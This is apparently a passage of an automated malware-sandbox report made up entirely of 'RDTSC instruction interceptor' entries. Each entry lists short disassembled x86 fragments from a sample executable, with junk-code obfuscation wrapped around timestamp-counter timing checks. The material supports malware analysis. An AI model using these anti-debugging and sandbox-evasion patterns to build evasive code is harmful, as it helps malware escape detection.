                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53003EF second address: 5300404 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320647 second address: 532064B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 532064B second address: 532064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 532064F second address: 5320655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320655 second address: 5320671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov bx, FDF0h 0x00000011 mov edi, 363A091Ch 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320671 second address: 532068E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA5CCB7DECFh 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 532068E second address: 53206F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA5CCB5262Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FA5CCB52630h 0x00000016 xchg eax, ecx 0x00000017 jmp 00007FA5CCB52630h 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007FA5CCB5262Ch 0x00000025 push ecx 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53206F0 second address: 5320720 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push edi 0x0000000c mov bx, si 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, ecx 0x0000001b mov al, 9Ch 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320720 second address: 5320743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52638h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320743 second address: 5320747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320747 second address: 5320785 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 4E19h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA5CCB52636h 0x0000000d popad 0x0000000e je 00007FA63E765826h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA5CCB52637h 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320785 second address: 53207B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA5CCB7DECDh 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53207B3 second address: 532082C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA5CCB52637h 0x00000009 adc esi, 268593AEh 0x0000000f jmp 00007FA5CCB52639h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FA5CCB52630h 0x0000001b and esi, 5E886528h 0x00000021 jmp 00007FA5CCB5262Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop edx 0x00000029 pop eax 0x0000002a xor eax, dword ptr [ebp+08h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA5CCB52631h 0x00000036 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 532082C second address: 5320841 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320841 second address: 53208B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 jmp 00007FA5CCB52639h 0x00000015 popad 0x00000016 ror eax, cl 0x00000018 jmp 00007FA5CCB5262Eh 0x0000001d leave 0x0000001e jmp 00007FA5CCB52630h 0x00000023 retn 0004h 0x00000026 nop 0x00000027 mov esi, eax 0x00000029 lea eax, dword ptr [ebp-08h] 0x0000002c xor esi, dword ptr [009B2014h] 0x00000032 push eax 0x00000033 push eax 0x00000034 push eax 0x00000035 lea eax, dword ptr [ebp-10h] 0x00000038 push eax 0x00000039 call 00007FA5D1502EF1h 0x0000003e push FFFFFFFEh 0x00000040 pushad 0x00000041 jmp 00007FA5CCB5262Eh 0x00000046 mov esi, 72C0B931h 0x0000004b popad 0x0000004c pop eax 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53208B9 second address: 53208BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53208BD second address: 53208C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53208C3 second address: 53208F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FA5D152E7BBh 0x00000010 mov edi, edi 0x00000012 jmp 00007FA5CCB7DECFh 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA5CCB7DED5h 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 53208F5 second address: 532093E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA5CCB52634h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA5CCB52630h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA5CCB52637h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 532093E second address: 5320944 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 5320944 second address: 5320948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0008 second address: 52D000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D000C second address: 52D0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0163 second address: 52D0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0169 second address: 52D0182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB5262Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0182 second address: 52D0186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0186 second address: 52D01A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D01A3 second address: 52D01CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d call 00007FA5CCB7DECDh 0x00000012 pop ecx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D01CA second address: 52D01CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D01CE second address: 52D022B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA5CCB7DED7h 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d pushad 0x0000000e mov bh, ch 0x00000010 jmp 00007FA5CCB7DED1h 0x00000015 popad 0x00000016 mov ebx, dword ptr [ebp+10h] 0x00000019 jmp 00007FA5CCB7DECEh 0x0000001e xchg eax, esi 0x0000001f jmp 00007FA5CCB7DED0h 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D022B second address: 52D022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D022F second address: 52D0233 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0233 second address: 52D0239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0239 second address: 52D0298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007FA5CCB7DED6h 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 jmp 00007FA5CCB7DED0h 0x00000017 xchg eax, edi 0x00000018 jmp 00007FA5CCB7DED0h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FA5CCB7DECEh 0x00000025 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0298 second address: 52D02FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 movzx eax, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d jmp 00007FA5CCB52635h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FA5CCB52633h 0x0000001c pushfd 0x0000001d jmp 00007FA5CCB52638h 0x00000022 adc ax, 45B8h 0x00000027 jmp 00007FA5CCB5262Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D02FD second address: 52D0305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0305 second address: 52D03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 je 00007FA63E7B092Fh 0x0000000d pushad 0x0000000e push edi 0x0000000f mov edi, esi 0x00000011 pop eax 0x00000012 mov ecx, edi 0x00000014 popad 0x00000015 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001c jmp 00007FA5CCB52637h 0x00000021 je 00007FA63E7B0919h 0x00000027 jmp 00007FA5CCB52636h 0x0000002c mov edx, dword ptr [esi+44h] 0x0000002f pushad 0x00000030 pushad 0x00000031 mov ecx, 3C0BC343h 0x00000036 mov ax, 509Fh 0x0000003a popad 0x0000003b popad 0x0000003c or edx, dword ptr [ebp+0Ch] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007FA5CCB52637h 0x00000046 sbb ah, FFFFFF9Eh 0x00000049 jmp 00007FA5CCB52639h 0x0000004e popfd 0x0000004f mov ecx, 3E08BF67h 0x00000054 popad 0x00000055 test edx, 61000000h 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FA5CCB52639h 0x00000062 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D03C4 second address: 52D03E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 42BF5F12h 0x00000008 mov esi, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007FA63E7DC17Dh 0x00000013 pushad 0x00000014 push edi 0x00000015 pushad 0x00000016 popad 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a mov ebx, 5F56170Eh 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D03E3 second address: 52D0422 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA5CCB5262Fh 0x00000008 or ecx, 75FC5FBEh 0x0000000e jmp 00007FA5CCB52639h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test byte ptr [esi+48h], 00000001h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0422 second address: 52D0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0435 second address: 52D043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D043B second address: 52D043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D043F second address: 52D0443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0443 second address: 52D0485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA63E7DC11Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FA5CCB7DED8h 0x00000017 xor esi, 4A4BF248h 0x0000001d jmp 00007FA5CCB7DECBh 0x00000022 popfd 0x00000023 mov eax, 7FF815BFh 0x00000028 popad 0x00000029 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0862 second address: 52C0866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0866 second address: 52C0883 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0883 second address: 52C08FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52631h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA5CCB52637h 0x00000011 or si, 02FEh 0x00000016 jmp 00007FA5CCB52639h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FA5CCB52630h 0x00000022 jmp 00007FA5CCB52635h 0x00000027 popfd 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C08FF second address: 52C0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0903 second address: 52C0963 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA5CCB52638h 0x00000008 xor ecx, 1B978B88h 0x0000000e jmp 00007FA5CCB5262Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov ch, 77h 0x00000018 popad 0x00000019 push edx 0x0000001a jmp 00007FA5CCB52630h 0x0000001f mov dword ptr [esp], esi 0x00000022 pushad 0x00000023 push ecx 0x00000024 mov edx, 0FF01200h 0x00000029 pop ebx 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FA5CCB5262Ah 0x00000037 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0963 second address: 52C0972 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0972 second address: 52C0978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0978 second address: 52C097C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C097C second address: 52C0980 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0980 second address: 52C09B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, 00000000h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA5CCB7DECAh 0x00000014 sbb al, FFFFFFA8h 0x00000017 jmp 00007FA5CCB7DECBh 0x0000001c popfd 0x0000001d mov di, cx 0x00000020 popad 0x00000021 test esi, esi 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov ch, bl 0x00000028 mov si, 948Fh 0x0000002c popad 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C09B8 second address: 52C09BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C09BE second address: 52C09C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C09C2 second address: 52C0A34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA63E7B7FEAh 0x0000000e jmp 00007FA5CCB52633h 0x00000013 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001a jmp 00007FA5CCB52636h 0x0000001f mov ecx, esi 0x00000021 jmp 00007FA5CCB52630h 0x00000026 je 00007FA63E7B7FB7h 0x0000002c jmp 00007FA5CCB52630h 0x00000031 test byte ptr [76FB6968h], 00000002h 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0A34 second address: 52C0A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0A38 second address: 52C0A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, 18A0B9C5h 0x0000000b popad 0x0000000c jne 00007FA63E7B7F98h 0x00000012 pushad 0x00000013 mov cl, 5Ch 0x00000015 mov si, di 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0A57 second address: 52C0AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA5CCB7DED3h 0x0000000a add si, 7E1Eh 0x0000000f jmp 00007FA5CCB7DED9h 0x00000014 popfd 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FA5CCB7DECEh 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA5CCB7DECEh 0x00000024 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0AAF second address: 52C0AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB5262Eh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0AC1 second address: 52C0AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bx, cx 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0AD3 second address: 52C0AD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0AD9 second address: 52C0ADD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0ADD second address: 52C0B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a mov eax, 224E3431h 0x0000000f pushad 0x00000010 mov esi, 71088733h 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 popad 0x0000001a mov dword ptr [esp], ebx 0x0000001d jmp 00007FA5CCB52632h 0x00000022 push dword ptr [ebp+14h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FA5CCB52637h 0x0000002c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0B28 second address: 52C0B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA5CCB7DED4h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0BAB second address: 52C0C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52639h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA5CCB5262Ch 0x00000012 and ch, 00000048h 0x00000015 jmp 00007FA5CCB5262Bh 0x0000001a popfd 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FA5CCB52636h 0x00000022 sub cl, FFFFFFA8h 0x00000025 jmp 00007FA5CCB5262Bh 0x0000002a popfd 0x0000002b call 00007FA5CCB52638h 0x00000030 pop eax 0x00000031 popad 0x00000032 popad 0x00000033 pop ebp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 movzx esi, bx 0x0000003c popad 0x0000003d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0C33 second address: 52C0C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52C0C39 second address: 52C0C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: 52D0DC0 second address: 52D0E17 instructions: 0x00000000 rdtsc 0x00000002 call 00007FA5CCB7DECCh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esi 0x0000000c jmp 00007FA5CCB7DECEh 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FA5CCB7DECDh 0x0000001c pushfd 0x0000001d jmp 00007FA5CCB7DED0h 0x00000022 sub ax, F7E8h 0x00000027 jmp 00007FA5CCB7DECBh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
